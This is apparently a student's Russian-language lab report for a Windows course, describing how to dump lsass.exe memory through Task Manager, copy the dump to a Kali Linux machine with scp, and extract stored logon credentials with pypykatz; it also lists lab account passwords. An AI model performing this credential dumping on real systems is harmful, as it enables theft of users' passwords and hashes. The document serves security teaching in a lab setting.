# Гришанов Матвей Сергеевич -- Windows Basic Практическая работа 3. ААА в Windows
[toc]
## 1) Анализ памяти Lsass.exe
Процесс анализа памяти:
* Создание дампа памяти
* Передача на виртуальную машину Kali Linux
* Анализ дампа с помощью mimikatz
:::info
:information_source: Для более детального анализа для начала проведём эмуляции различных пользователей на **Windows 10**.
:::
---
1.1 Заходим под учётной записью Ольги.
:::info
login: Olga
password: O-Qq123456
:::
---
1.2 Обращаемся к ресурсам домена.
:::info
:information_source: Для этого заходим в ==Проводник-->Сеть-->\\pt.local==
:::
---
1.3 Выйдем из учетной записи Ольги и зайдём под учетной записью Петра.
:::info
login: Petr
password: P-Qq123456
:::
---
1.4 Запускаем командную строку от имени администратора.
:::info
:information_source: Так как Petr не является администратором PC1 - вводим данные ADMpetr
login: ADMpetr
password: Qq123456
:::
---
1.5 Введём команду `whoami`, чтобы проверить от имени какой учетной записи запущена командная строка.
---
1.6 Теперь запустим диспетчер задач от имени администратора **ADMPetr**.
---
1.7 Откроем подробное представление, перейдём в подробности и найдём процесс ==lsass.exe==. Далее нажмем **ПКМ** по процессу ==lsass.exe== и выберем пункт **"Создать дамп файла"**.
---
:::success
:star: Дамп успешно создан!
:::
Запоминаем его расположение - оно нам ещё понадобится.
---
1.8 Теперь переходим к виртуальной машине **Kali-Linux**, чтобы включить ==ssh== и передать дамп-файл. Открываем консоль.
---
1.9 Повышаем привилегии с помощью команды `sudo -i` и включаем сервис ==ssh==.
---
1.10 Возвращаемся в Windows 10 Pro и с помощью командной строки, запущенной от имени ADMpetr передаём дамп-файл на Kali-Linux.
Необходимо использовать команду:
```
scp C:\\Users\\ADMpetr\\AppData\\Local\\Temp\\lsass.DMP kali@192.168.10.9:/home/kali
```
:::info
:information_source:
192.168.10.9 -- IP-адрес Kali-Linux.
После ввода команды нужно подтвердить fingerprint (yes), а после ввести пароль Kali-Linux.
:::
:::success
:star: Файл успешно передан!
:::
---
1.11 После передачи проверяем наличие файла в директории ==/home/kali== с помощью команды `ls /home/kali`.
---
1.12 Переключаемся в директорию с ==lsass== и скачиваем скрипт ==pypykatz==.
Используем команды:
```
cd /home/kali
```
```
git clone https://github.com/skelsec/pypykatz
```
---
1.13 Переходим в директорию ==pypycatz== и выполняем скрипт, применив его к скачанному ранее дамп-файлу.
Для этого используем команды:
```
cd pypykatz/pypykatz
```
```
pypykatz lsa minidump /home/kali/lsass.DMP
```
:::success
:star: Скрипт успешно выполнился!
:::
:::info
:information_source: Если из директории ==pypykatz== не сработал, то установите его. В верхней папке есть ==setup.py==, запустите его командой ==`python3 setup.py -install`==.
:::
---
1.14 Увидим учетные данные, которые скрипт достал из процесса lsass.
:::info
:information_source: Память процесса lsass содержит учетные данные и ADMPetr, и Petr, так как эти пользователи были активны в момент создания дампа процесса. Под активностью понимается не только прямая сессия с ПК, но и действия, совершаемые по сети, а так же запуск процессов на ПК (как локальный запуск, так и удалённый).
:::
---
Sign in with Wallet
Connect another wallet